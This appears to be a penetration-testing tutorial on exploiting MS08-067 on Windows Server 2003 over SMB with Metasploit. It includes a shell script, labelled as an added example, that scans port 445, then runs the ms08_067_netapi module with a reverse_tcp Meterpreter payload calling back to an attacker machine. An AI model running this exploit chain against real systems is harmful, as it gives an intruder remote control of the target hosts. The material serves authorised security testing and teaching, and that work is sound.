As a professional penetration tester you will have to deal with various systems, including Windows and Linux. Microsoft servers have a large share of the market, so most of your clients will probably run some version of Windows Server (2003 or 2008) that you will need to assess. In this article we will focus on exploiting a Windows Server 2003 machine through the Microsoft Directory Services (microsoft-ds) port.
We have performed a port scan with Nmap and discovered that the microsoft-ds service is open on port 445. This service carries SMB (SMB over TCP), which is used for file sharing in Windows environments.
Our next step is to open the Metasploit Framework and find an exploit that will give us access to the remote server. We already know that port 445 is the SMB service, so we search for SMB exploits such as the netapi modules.
Specifically, the exploit we are going to use is ms08_067_netapi, which targets MS08-067: a parsing flaw in the path canonicalization code of NetAPI32.dll, reachable through the Server service over SMB.
So we configure the exploit with the appropriate IP addresses (the target as RHOST and our own machine as LHOST) and select a Meterpreter payload.
Now it is time to run the exploit against the target machine; as we can see from the image below, it successfully opened a Meterpreter session.
We can use the sysinfo command of Meterpreter to gather our first information about the Windows Server 2003 machine, such as the OS version, service pack and architecture.
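The whole sequence described above (find the module, set the addresses, choose a Meterpreter payload, run the exploit, then query the session) can be scripted so that it is repeatable across a lab. The following is an added example, not code from the original article: it generates a Metasploit resource script with the real module and option names (RHOSTS is accepted by current Framework versions; older ones use RHOST). The target address 192.168.1.10, the attacker address 192.168.1.5 and the listener port 4444 are assumed lab values.

```shell
#!/bin/sh
# Added example: build and (optionally) run a Metasploit resource script for the
# MS08-067 workflow described in the article. Addresses below are assumed lab values.
TARGET="${TARGET:-192.168.1.10}"    # assumed target running Windows Server 2003
ATTACKER="${ATTACKER:-192.168.1.5}" # assumed attacker address for the reverse shell
LPORT="${LPORT:-4444}"              # assumed listener port

# build_rc TARGET LHOST LPORT -> prints an msfconsole resource script to stdout.
# "check" asks the module to fingerprint the host before any exploitation is
# attempted; "exploit -z" opens the session without dropping into it, so the
# script can continue and query it with sysinfo.
build_rc() {
    target="$1"; lhost="$2"; lport="$3"
    cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $target
set LHOST $lhost
set LPORT $lport
set PAYLOAD windows/meterpreter/reverse_tcp
check
exploit -z
sessions -C sysinfo
EOF
}

# run_msf TARGET LHOST LPORT -> confirms 445/tcp with Nmap (smb-os-discovery is a
# standard NSE script), writes the resource script and hands it to msfconsole.
run_msf() {
    rc=$(mktemp /tmp/ms08_067.XXXXXX.rc)
    build_rc "$1" "$2" "$3" > "$rc"
    if command -v nmap >/dev/null 2>&1; then
        nmap -Pn -p445 --script smb-os-discovery "$1"
    fi
    msfconsole -q -r "$rc"
}

# Only launch tools when explicitly asked; otherwise just define the functions.
if [ "${1:-}" = "run" ]; then
    run_msf "$TARGET" "$ATTACKER" "$LPORT"
fi
```

Invoke it as `TARGET=<ip> ATTACKER=<ip> sh ms08_067.sh run`. The `check` line is the practical safeguard the article's service-pack note calls for: if the module reports the host as not vulnerable (patched, or not one of the supported versions), stop there rather than risk crashing the Server service with a mismatched target.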
microsoft-ds is a very common service on Windows machines. Most servers have it enabled, so they will be easy to exploit unless a firewall filters port 445 or the MS08-067 patch has been applied. Remember that if you use this exploit against Windows Server 2003 it will only work on Windows 2003 SP0, SP1 and SP2, and the target selected in the module must match the service pack of the host, since the return addresses used by the exploit are version-specific.